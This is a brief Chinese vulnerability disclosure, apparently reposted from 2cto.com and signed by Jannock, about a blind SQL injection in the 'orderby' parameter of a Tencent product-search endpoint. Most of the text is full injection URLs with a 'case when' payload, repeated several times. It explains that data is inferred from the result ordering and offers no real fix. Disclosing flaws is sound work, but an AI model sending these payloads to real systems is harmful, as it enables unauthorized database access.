网址：
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data
 
注入参数orderby
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 www.2cto.com
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
漏洞证明：http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
修复方案：
应该懂得！
作者：Jannock